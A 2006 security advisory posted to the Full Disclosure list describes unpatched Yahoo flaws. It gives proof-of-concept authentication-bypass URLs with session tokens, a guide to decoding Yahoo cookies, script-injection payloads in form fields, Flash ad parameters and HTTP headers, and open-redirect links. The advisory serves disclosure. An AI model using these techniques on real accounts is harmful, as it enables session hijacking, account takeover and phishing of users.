Full Disclosure mailing list archives
Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding, Cookie Encoding Security Weakness, Cross-Site Scripting and URL Redirection)
From: Rajesh Sethumadhavan <rajesh.sethumadhavan () yahoo com>
Date: Tue, 20 Jun 2006 04:09:01 -0700 (PDT)
--------------------------------- How low will we go? Check out Yahoo! Messengers low PC-to-Phone call rates.
Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding, Cookie Encoding Security Weakness, Cross-Site Scripting and URL Redirection) ############################################################################ # # XDisclose Advisory : XD100001 # Advisory Released : 20th June 06 # Credit : Rajesh Sethumadhavan # # Class : Authentication Bypass # Session Binding Vulnerability # Cookies Encoding Security Weakness # Cross-Site Scripting # URL redirection # Severity : Medium # Solution Status : Unpatched # Vendor : Yahoo # Affected applications : Yahoo multiple web-based services # ############################################################################ Overview: Yahoo! Inc. is an American computer services company with a mission to "be the most essential global Internet service for consumers and businesses". It operates an Internet portal, including the popular Yahoo! Mail.According to Web trends Yahoo! is the most visited website on the Internet today with more than 400 million unique users. The global network of Yahoo! websites received 3.4 billion page views per day on average as of October 2005. Various Yahoo! services are vulnerable to authentication bypass, session binding, weak cookie encoding, cross-site scripting file inclusion and url redirection vulnerabilities, which is caused due to improper validation of user-supplied inputs. Description: Multiple vulnerabilities exist in various Yahoo services. 1. Authentication Bypass and Session Binding Vulnerability. A malicious user can log on to the yahoo without submitting the username and password by constructing a malicious URL using cookies. Same session (URL) can be used to login multiple times from multiple IP address leading to session binding vulnerability. POC: -------------------------------------------------------------------------- http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11 %26l=i42.j4ij/o&.t=T=sk=DAAXxtibJfco8U%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0 BYQFRQUUBdGlwAVNQZHhvQgF6egFYazdsRUJnV0E-&.done=http%3a//mail.yahoo.com -------------------------------------------------------------------------- http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11 %26l=i42.j4ij/o%26p=m2gvvind12000700&.t=T=sk=DAAXxtibJfco8U%26d=c2wBTlRVMU FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFYazdsRUJnV0E-&.done=http %3a//mail.yahoo.com -------------------------------------------------------------------------- Where in "sk" & "d" is session Screenshot: http://www.xdisclose.bravehost.com/Images/Yahoo! Auth Bypass.png 2. Cookie Encoding Security Weakness Implementation of cookies in yahoo is too weak that it can be decoded easily. A malicious attacker can easily collect many personal information using cookies like year of birth, zipcode, country and name which can be used to get password from "yahoo forgot password". Where in sk & d is session n is password l is username p is country, year of birth, gender and more b is cookies created lg is language intl is international language iz is zipcode jb is Industry and title POC Screenshot: http://www.xdisclose.bravehost.com/Images/Yahoo Cookie Encoding.png 3. Cross-Site Scripting. This vulnerability is resulted from the failure of Yahoo! filtering engine to block cretin user-supplied inputs a) Yahoo Calendar Service XSS The flaws are due to improper sanitization of inputs passed to "Location", "Address", "Street" and "Phone". ======================================================================== This event repeats every day. </font><br> <font face="Arial" size=-1> <b>Event Location</b>: <script>alert('Location')</script> <br><b>Street</b>: <script>alert('Address')</script> <br><b>City, State, Zip</b>: <script>alert('Street')</script> <br><b>Phone</b>: <script>alert('Phone')</script> </font><br> ======================================================================== Screenshot: http://www.xdisclose.bravehost.com/Images/XSS Calendar location.png http://www.xdisclose.bravehost.com/Images/XSS Calendar Address.png http://www.xdisclose.bravehost.com/Images/XSS Calendar Street.png http://www.xdisclose.bravehost.com/Images/XSS Calendar Phone.png b) Yahoo Options Mail Account XSS The flaws are due to improper sanitization of inputs passed to "Name" and "Reply to" parameters. ======================================================================== <tr valign="top"> <td>Name:</td> <td><script>alert('Name')</script></td> </tr> <tr valign="top"> <td>Email:</td> <td>sec.test () yahoo com</td> </tr> <tr valign="top"> <td>Reply-To:</td> <td><script>alert('Reply')</script>@yah.com</td> </tr> ======================================================================== Screenshot: http://www.xdisclose.bravehost.com/Images/XSS Mail Account Reply.png http://www.xdisclose.bravehost.com/Images/XSS Mail Account Name.png c) Yahoo Options Filter XSS. The flaws are due to improper sanitization of inputs passed to "From" and "To" parameters ======================================================================== <b>From</b> contains "<b><script>alert('From')</script>@yahoo.com</b>" <br> <b>To/CC</b> contains "<b><script>alert('To')</script>@yahoo.com</b>" <br> ======================================================================== Screenshot: http://www.xdisclose.bravehost.com/Images/Xss Filter From.png http://www.xdisclose.bravehost.com/Images/Xss Filter To.png d) Yahoo Ads flash file XSS. The flaws are due to improper sanitization of inputs passed to flash Ads files Exploit: ----------------------------------------------------------------------- http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/ 20060330_68006_asker1_sound.swf?clickTAG=javascript:alert('XSS%20 Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh') http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/ 20060330_68006_1_425x600_monster_morph_asker_1_check.swf?clickTAG= javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20 Rajesh') http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/ 042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=javascript:alert('XSS %20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh') http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/ 042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=javascript:alert ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh') http://ad.ie.doubleclick.net/812666/specsavers_2for1euro_300x250.swf? clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20 By%20Rajesh') http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/ 042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=javascript:alert ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh') http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/ 20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=javascript:alert ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh') http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/ 20060512_65459_1_360x100_mwa1_mail_accolades.swf?clickTAG=javascript: alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh') and more ----------------------------------------------------------------------- Screenshot: http://www.xdisclose.bravehost.com/Images/XSS Flash Ads.png e) Yahoo Mail Beta HTTP Header XSS The flaws are due to improper sanitization of inputs passed to all HTTP header like Accept, Accept-Charset, Accept-Language, Cache-Control, Connection, Content-Length, Content-Type, Cookie, Keep-Alive, Pragma, SOAPAction and User-Agent in Yahoo Mail Beta. POC : ======================================================================== GET : http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=CKyO7/zcUU2 Host: uk.f555.mail.yahoo.com User-Agent: <script>alert('User-Agent:')</script> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5;<script>alert('Accept:')</script> Accept-Language: en-us,en;q=0.5;<script>alert('Accept-Language:')</script> Accept-Encoding: gzip,deflate;<script>alert('Accept-Encoding:')</script> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert ('Accept-Charset:')</script> Keep-Alive: 300;<script>alert('Keep-Alive:')</script> Connection: keep-alive;<script>alert('Connection:')</script> SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert('SOAPAction:') </script> Content-Length: <script>alert('Content-Length:')</script> Content-Type: application/xml;<script>alert('Content-Type:')</script> Cookie: B=dcnl4j129c7tu&b=3&s=j3; F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitnkGkgOOjxwPKS6&b=bIpq; Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&p=m2gvvind12000700&jb=19|24|&iz=123456 r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-; T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&a=QAE&sk=DAAZ7oQuYalSuV& d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0 E-; U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB&un=0kvgvgv3qlf11; YM.dpref1=sec.test%3Aspp%257C1;<script>alert('Cookie:')</script> Pragma: no-cache;<script>alert('Pragma:')</script> Cache-Control: no-cache;<script>alert('Cache-Control:')</script> ======================================================================== Screenshot: http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept-Charset.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept-Language.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cache-Control.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta Connection.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta Content-Length.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta Content-Type.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cookie.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta Keep-Alive.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta Pragma.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta SoapAction.png http://www.xdisclose.bravehost.com/Images/XSS MailBeta User-Agent.png Impact: Successful exploitation allows execution of arbitrary script code in a users browser session in context of an affected site which may allow to steal cookie based authentication credentials. 3. URL redirection. This is due failure of filtering of incoming untrusted data before the content reaches their users .This can be exploited for phishing attack. The vulnerable parameters are yahoo search web, image, video, preferences, cache, yahoo answers and more urls containing /*http://yahoo.com or /**http:// yahoo.com Exploit: --------------------------------------------------------------------------- http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do5qdq6/EXP= 1148028186/**http%3a//www.xdisclose.com http://search.yahoo.com/preferences/preferences?pref_done= http%3a//www.xdisclose.com --------------------------------------------------------------------------- Screenshot: http://www.xdisclose.bravehost.com/Images/URL Redirection WebSearch.png http://www.xdisclose.bravehost.com/Images/URL Redirection Images.png http://www.xdisclose.bravehost.com/Images/URL Redirection Video.png 4) Interesting facts about Yahoo Yahoo Mail Inbox shows wrong unread messages count if it is above 65535 unread messages. Screenshot: http://www.xdisclose.bravehost.com/Images/Yahoo Inbox.png Original Advisory: http://www.xdisclose.com/XD100001.txt Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your own email account. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding, Cookie Encoding Security Weakness, Cross-Site Scripting and URL Redirection) Rajesh Sethumadhavan (Jun 20)